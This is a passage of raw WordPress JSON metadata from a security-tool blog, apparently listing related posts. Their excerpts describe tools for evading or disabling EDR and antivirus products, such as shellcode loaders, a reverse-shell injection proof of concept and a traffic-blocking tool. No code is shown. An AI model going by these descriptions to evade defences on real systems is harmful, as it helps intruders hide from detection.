https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":34994,"url":"https:\/\/kalilinuxtutorials.com\/edr-antivirus-bypass-to-gain-shell-access\/","url_meta":{"origin":30826,"position":1},"title":"EDR-Antivirus-Bypass-To-Gain-Shell-Access","author":"Varshini","date":"September 30, 2024","format":false,"excerpt":"This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique. The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms. Description This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWrYj5JBRTWaku0cUxoZP9MQIDW-1Dq9bjy9Fw0wlnMxHEQjZGagAs_cNQFozkHA6FXj1Rpa_yffFlhsQGpgsFPKjxOZtW-vbqcGV5rHkXdTWxSy6YH6lypTYOACwBlg-m9VYC5U_UJMB-lnTLTswDCPyEXX7rkixM8W5qOy05FJ3HtVdDTTKSu4dpfUFZ\/s1600\/EDR-Antivirus-Bypass-To-Gain-Shell-Access.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":35978,"url":"https:\/\/kalilinuxtutorials.com\/krueger\/","url_meta":{"origin":30826,"position":2},"title":"Krueger : Exploiting Windows Defender To Neutralize EDR Systems","author":"Varshini","date":"January 31, 2025","format":false,"excerpt":"Krueger is a Proof of Concept (PoC) .NET post-exploitation tool designed to disable Endpoint Detection and Response (EDR) systems during lateral movement in a network. Developed by security researcher Logan Goins, Krueger leverages Windows Defender Application Control (WDAC), a Microsoft utility originally intended to enhance security by controlling executable code\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/01\/Krueger-1.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":31626,"url":"https:\/\/kalilinuxtutorials.com\/edrsilencer\/","url_meta":{"origin":30826,"position":3},"title":"EDRSilencer: A Tool for Managing EDR Outbound Traffic with Windows Filtering Platform.","author":"Varshini","date":"January 5, 2024","format":false,"excerpt":"Inspired by the closed source FireBlock tool\u00a0FireBlock\u00a0from MdSec NightHawk, I decided to create my own version and this tool was created with the aim of blocking the outbound traffic of running EDR processes using Windows Filtering Platform (WFP) APIs. This tool offers the following features: Search known running EDR processes\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjr6oeu2As6VY7UB7cuM17Ncd4TtMdckOBg-rP8GWnwtPGil3cxk6PIhluYEh6uM63nPqOoQaXxW-h_V3flovvc2T8F3BL-nWFSOB_FdPgvYqAQCzbki_IQGuMmdzTFe9EEDykuq_uj0Zieit3eRP1qpZh6XYuouOun_QONzZU_nc6H_9gStCNKgnSwPA\/s16000\/EDRSilencer.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":35492,"url":"https:\/\/kalilinuxtutorials.com\/hellbunny\/","url_meta":{"origin":30826,"position":4},"title":"HellBunny : Advanced Shellcode Loader For EDR Evasio","author":"Varshini","date":"December 24, 2024","format":false,"excerpt":"HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect syscalls for evading EDR hooks. It can be built as EXE, DLL, or XLL and offers a variety of QoL features that make it more adaptable. The purpose of this research project was to develop\u2026","rel":"","context":"In "Malware"","block_context":{"text":"Malware","link":"https:\/\/kalilinuxtutorials.com\/category\/malware\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbCBsVm9kjeItUmtI4JM7YoR2p5cz8Gp8XDtpRbVU0cjTqIFWGHcWRr5gdrCUas_gOZRpDqzxN-iyIw7xSsTAgUtxmN2WAmNsDdo7aGCxVzH1sWydoQdzjAfDk37sSOL5piS5aD83S6rpLhFIsS13L1asitHJs3EAgMD_LWx-b7DlCdEDBpEL3QiiALX5Y\/s1600\/HellBunny%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":23066,"url":"https:\/\/kalilinuxtutorials.com\/edrhunt\/","url_meta":{"origin":30826,"position":5},"title":"EDRHunt : Scan Installed EDRs And AVs On Windows","author":"R K","date":"March 21, 2022","format":false,"excerpt":"EDRHunt scans Windows services, drivers, processes, registry for installed EDRs (Endpoint Detection And Response). Read more about EDRHunt Install BinaryDownload the latest release from the release section. Releases are built for windows\/amd64.GoRequires Go to be installed on system. Tested on Go1.17+.go install github.com\/FourCoreLabs\/EDRHunt\/cmd\/EDRHunt@master Usage Find installed EDRs $ .\\EDRHunt.exe scan[EDR]Detected\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEj1yD3sxtw8ppEk3AY3DJIW1UpcIVlwOguOUGyVWBTGV0Ds8ihM6HZG6CAmcMmgePxHsuD_Vw31XUVDOxkkb0Sy5l5D6oUv5BJsjFqvUiyaNE1ySnSeuPV-2KZa3dApQDgXVH2eBYcacfIP378TimKaKAmv5yPzOnPr20qXcwA4PHHY1Ff_dxvvfbkm=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEj1yD3sxtw8ppEk3AY3DJIW1UpcIVlwOguOUGyVWBTGV0Ds8ihM6HZG6CAmcMmgePxHsuD_Vw31XUVDOxkkb0Sy5l5D6oUv5BJsjFqvUiyaNE1ySnSeuPV-2KZa3dApQDgXVH2eBYcacfIP378TimKaKAmv5yPzOnPr20qXcwA4PHHY1Ff_dxvvfbkm=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEj1yD3sxtw8ppEk3AY3DJIW1UpcIVlwOguOUGyVWBTGV0Ds8ihM6HZG6CAmcMmgePxHsuD_Vw31XUVDOxkkb0Sy5l5D6oUv5BJsjFqvUiyaNE1ySnSeuPV-2KZa3dApQDgXVH2eBYcacfIP378TimKaKAmv5yPzOnPr20qXcwA4PHHY1Ff_dxvvfbkm=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEj1yD3sxtw8ppEk3AY3DJIW1UpcIVlwOguOUGyVWBTGV0Ds8ihM6HZG6CAmcMmgePxHsuD_Vw31XUVDOxkkb0Sy5l5D6oUv5BJsjFqvUiyaNE1ySnSeuPV-2KZa3dApQDgXVH2eBYcacfIP378TimKaKAmv5yPzOnPr20qXcwA4PHHY1Ff_dxvvfbkm=s728 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/30826","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=30826"}],"version-history":[{"count":5,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/30826\/revisions"}],"predecessor-version":[{"id":30843,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/30826\/revisions\/30843"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/30844"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=30826"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=30826"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=30826"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}